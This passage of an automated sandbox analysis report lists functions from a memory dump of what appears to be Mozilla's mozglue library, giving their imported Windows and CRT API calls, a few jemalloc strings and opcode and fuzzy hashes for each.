Opcode ID: ca6fda06d31428fbf50f148c689e7f89357c1907ab14116d1de2f10f36f69d47
Instruction ID: 28abdbda843d67628d45e02d5a2db831f559408184ebe65246653e6509dd9ed1
Opcode Fuzzy Hash: ca6fda06d31428fbf50f148c689e7f89357c1907ab14116d1de2f10f36f69d47
Instruction Fuzzy Hash: 5F41B371B402264FDF04CE6D9C9236A76A2EB89750F150239EA18E73C5E7B1AC00CF99

Function 665D4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 665D4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 665D4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 665D4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 665D4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 665D4F1E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 09e20f36a35838341180125f4865682bc1de20bf55644437e1e5dba7696edf90
Instruction ID: c8c6a04194190b30b4ad5a052f98012e422ff238cf3ddb7a92d2f086bdab3b5d
Opcode Fuzzy Hash: 09e20f36a35838341180125f4865682bc1de20bf55644437e1e5dba7696edf90
Instruction Fuzzy Hash: 3841BF71A08706AFC704CF28C88195BBBE4FF89350F108A2DF5A697391DB30E954CB96

Function 665EC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 665EC1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 665EC1DC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: f960a12277a3428ed61ba7949a815f614c95e3b9688006c73e1b4a747a680145
Instruction ID: f76709bbe2d12ed7b3cef10ae7725e3de9dba71757b36beff3349562c27f42bc
Opcode Fuzzy Hash: f960a12277a3428ed61ba7949a815f614c95e3b9688006c73e1b4a747a680145
Instruction Fuzzy Hash: 1541A4B1D187408FDB10CF64D98175ABFE5AFA6304F41895DE8985B312E730D944CBD2

Function 6663A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665F770), ref: 6663A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6663A87B

Part of subcall function 6663A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6663A88F,00000000), ref: 6663A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6663A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6663A90C
LeaveCriticalSection.KERNEL32(6665F770), ref: 6663A97E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 65229727c543cd2e0fa954778ea49c1732b42d3decfd95a107db1b26b6ac8ed4
Instruction ID: 7a1d938e2568c418a7108b11e348bdb2871133e633426a4cc896d60fb2488c25
Opcode Fuzzy Hash: 65229727c543cd2e0fa954778ea49c1732b42d3decfd95a107db1b26b6ac8ed4
Instruction Fuzzy Hash: 6B419FB0D002589BDF00DFA4E885B9EBB71FF44324F148629E826BB3D1D771A945CB91

Function 665E1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,665E152B,?,?,?,?,665E1248,?), ref: 665E159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,665E152B,?,?,?,?,665E1248,?), ref: 665E15BC
moz_xmalloc.MOZGLUE(-00000001,?,665E152B,?,?,?,?,665E1248,?), ref: 665E15E7
free.MOZGLUE(?,?,?,?,?,?,665E152B,?,?,?,?,665E1248,?), ref: 665E1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,665E152B,?,?,?,?,665E1248,?), ref: 665E1637

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 43496f280c34455e7fae3adecde26a3bc8c88645dfdd2c049adf77a756faa30f
Instruction ID: d81f8cca619773caa32e4df529a37bd9fc42fff27f79c45e378fc092e41860da
Opcode Fuzzy Hash: 43496f280c34455e7fae3adecde26a3bc8c88645dfdd2c049adf77a756faa30f
Instruction Fuzzy Hash: 2B31E8B2A002148BDF28CF78D85246E77E9BA952647250B2DE437DB6D4EB30D9018B91

Function 665D4310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,665D42D2), ref: 665D436A

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,665D42D2), ref: 665D4387
moz_xmalloc.MOZGLUE(80000023,?,665D42D2), ref: 665D43B7
free.MOZGLUE(00000000,?,665D42D2), ref: 665D43EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,665D42D2), ref: 665D4406

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: 584b47f629599d3a34e649cc949ea21a5520c8aafd19c59570e1ed928644c8d5
Instruction ID: 36acceacefe7ac5c897d291b8db83a524da7e965483c14c2734eb709a03b82cc
Opcode Fuzzy Hash: 584b47f629599d3a34e649cc949ea21a5520c8aafd19c59570e1ed928644c8d5
Instruction Fuzzy Hash: EA31F772A001158FD714DF6CDC8256EBBA6EB90264F140A29E925DB3C0E730ED9087D6

Function 6663AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6664E330,?,665FC059), ref: 6663AD9D

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6664E330,?,665FC059), ref: 6663ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6664E330,?,665FC059), ref: 6663AE01
GetLastError.KERNEL32(?,00000000,?,?,6664E330,?,665FC059), ref: 6663AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6664E330,?,665FC059), ref: 6663AE3D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: c4644e6bc15756bdc999457e19257b02c5cc6109bf39bdf864cd32f69d750ed9
Instruction ID: 92445948ac7cb2513a9d768833d9febd72f669107e5046ec2b5004b387e223fb
Opcode Fuzzy Hash: c4644e6bc15756bdc999457e19257b02c5cc6109bf39bdf864cd32f69d750ed9
Instruction Fuzzy Hash: 8C3141B19003659FDB14DF769C45AABBBF9EF49610F058429E95AE7240EB34D800CBA4

Function 66630B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 66630BBC

Part of subcall function 665F5C50: GetTickCount64.KERNEL32 ref: 665F5D40
Part of subcall function 665F5C50: EnterCriticalSection.KERNEL32(6665F688), ref: 665F5D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 66630BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 66630BD5

Part of subcall function 665F5C50: __aulldiv.LIBCMT ref: 665F5DB4
Part of subcall function 665F5C50: LeaveCriticalSection.KERNEL32(6665F688), ref: 665F5DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 66630BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 66630C9A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: e58b9daee985879fc568e7ec031b58a2396ffc9269dd698175d7d1091cb832c3
Instruction ID: 0d90f7515467033c228b31e6c22b093947924927d1892d0316cdce139e066dc6
Opcode Fuzzy Hash: e58b9daee985879fc568e7ec031b58a2396ffc9269dd698175d7d1091cb832c3
Instruction Fuzzy Hash: 1431D271E147248BC715DF39989011BBBE9AFC67A0F118B1DF8A5A3290DB7098458BE2

Function 66635EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6664DCA0,?,?,?,6660E8B5,00000000), ref: 66635F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6660E8B5,00000000), ref: 66635F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6660E8B5,00000000), ref: 66635F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6660E8B5,00000000), ref: 66635F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6660E8B5,00000000), ref: 66635FD6

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 859be35d0111045e18719d39ff9642bd15e4fe3771a2fb52e7d4375c3074029c
Instruction ID: 63d1d6bc8ce7d4e13e558c14ee922cea1d3bce89673680432fbd55536da66aa0
Opcode Fuzzy Hash: 859be35d0111045e18719d39ff9642bd15e4fe3771a2fb52e7d4375c3074029c
Instruction Fuzzy Hash: 6E3107346006208FD710CF29E898A2ABBE6BFC9315B949668E5569B795C731EC41CF80

Function 665DB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 665DB532
moz_xmalloc.MOZGLUE(?), ref: 665DB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 665DB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 665DB57E
free.MOZGLUE(00000000), ref: 665DB58F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 05ef8200cb6e90d61047ed2437754f09445dbf9f0aafdaa2a917c6c5ceefd9e9
Instruction ID: 45f7cc75277c802066ddb964eb26ccab204c707d436b36fab764b63d45e3bd0e
Opcode Fuzzy Hash: 05ef8200cb6e90d61047ed2437754f09445dbf9f0aafdaa2a917c6c5ceefd9e9
Instruction Fuzzy Hash: C521D6B19002059BDB00DF69DC41B6ABFBAFF86314F144029E918DB381F776D911CBA5

Function 665DB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 665DB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 665DB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 665DB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 665DB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665DB849

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: e488f13f7a15da128658624b8b4203aea7dabb2a7a14dbd289042993fd62f295
Instruction ID: 45014cac91a54a80d4b69f35a7ebf77ee3e2209bc781a8502306913d6a73c0d4
Opcode Fuzzy Hash: e488f13f7a15da128658624b8b4203aea7dabb2a7a14dbd289042993fd62f295
Instruction Fuzzy Hash: C7212EB0D002199FDF04DFA9D8856BEBBB5EF89314F14812AED06A7341E731A944CBE5

Function 66636E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 66636E78

Part of subcall function 66636A10: InitializeCriticalSection.KERNEL32(6665F618), ref: 66636A68
Part of subcall function 66636A10: GetCurrentProcess.KERNEL32 ref: 66636A7D
Part of subcall function 66636A10: GetCurrentProcess.KERNEL32 ref: 66636AA1
Part of subcall function 66636A10: EnterCriticalSection.KERNEL32(6665F618), ref: 66636AAE
Part of subcall function 66636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 66636AE1
Part of subcall function 66636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 66636B15
Part of subcall function 66636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 66636B65
Part of subcall function 66636A10: LeaveCriticalSection.KERNEL32(6665F618,?,?), ref: 66636B83

MozFormatCodeAddress.MOZGLUE ref: 66636EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 66636EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 66636EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 66636EFF

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 73258b405ca733ac7adc61d6bce1be81d7153c951231d2d779ad93985de7df10
Instruction ID: 57f9b2c814dc6a049a74a5e26201a04fe8f8b45f0ea0f42700f015ab5c3f2b76
Opcode Fuzzy Hash: 73258b405ca733ac7adc61d6bce1be81d7153c951231d2d779ad93985de7df10
Instruction Fuzzy Hash: 4721A471D0422A9FDF04CF6AE88569E7BF6EF84308F004039E90997241DB709A58CF92

Function 665E6390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 665E63D0
AcquireSRWLockExclusive.KERNEL32 ref: 665E63DF
ReleaseSRWLockExclusive.KERNEL32 ref: 665E640E
__Init_thread_footer.LIBCMT ref: 665E6467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 665E64A8

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: a5d0d306954d2e08ceb534245100f8399317302a0d6f47c3cfac107cd9a8f581
Instruction ID: 0494e46b09cffb736f002d720ad6e651df3fcaa73e8c80ee2d1b23c847741c68
Opcode Fuzzy Hash: a5d0d306954d2e08ceb534245100f8399317302a0d6f47c3cfac107cd9a8f581
Instruction Fuzzy Hash: 99315CB15043558FDB00DF6AE65666ABFE2EBC6354F11492EEAD583242C7309884CFA3

Function 66639B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 66639B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 66639BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 66639BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 66639BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 66639BE0

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: d5e5e62c86f19863c1941df978d94fea19816a31f33e7f4ef6188e184eb0fb2e
Instruction ID: c1b573323d1719f6abefbc396dc8a2c24ae8a0ebbcdbe89d871b3ab90b37abf0
Opcode Fuzzy Hash: d5e5e62c86f19863c1941df978d94fea19816a31f33e7f4ef6188e184eb0fb2e
Instruction Fuzzy Hash: FB11C232914758A7C7009F68EC4089BBBBCFFC6368F006B0DF9965A140EF31A954CB96

Function 66610D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,665D3DEF), ref: 66610D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,665D3DEF), ref: 66610D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,665D3DEF), ref: 66610DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 66610D97, 66610DBE
<jemalloc>, xrefs: 66610D92, 66610DB9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 6d59bda429c35ae6291acd530a461ad914722aea53268f07776f780dda23af20
Instruction ID: 705334213b54190ac438710c3b0fb0b2a20c039de36891fd45a30cc0a0a5134e
Opcode Fuzzy Hash: 6d59bda429c35ae6291acd530a461ad914722aea53268f07776f780dda23af20
Instruction Fuzzy Hash: 09F08931B9821523EE60556EBD1BB9AA65F6BC2B61F214036F304DA1C0DE90E43086E5

Function 66635850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6663586C
CloseHandle.KERNEL32 ref: 66635878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 66635898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 666358C9
free.MOZGLUE(00000000), ref: 666358D3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 5ef06c799af3a641d063c7c189b673f89d238a9b0390a440f076da240cac30ea
Instruction ID: 2eac8001b14cbf250eb761eac6818960801dfdb3381d1ab3ec9e7a30134ee835
Opcode Fuzzy Hash: 5ef06c799af3a641d063c7c189b673f89d238a9b0390a440f076da240cac30ea
Instruction Fuzzy Hash: CD01ECB1914131ABDB01EF17FC0A6067BABEBE23257248176E71AD3210D73198158F81

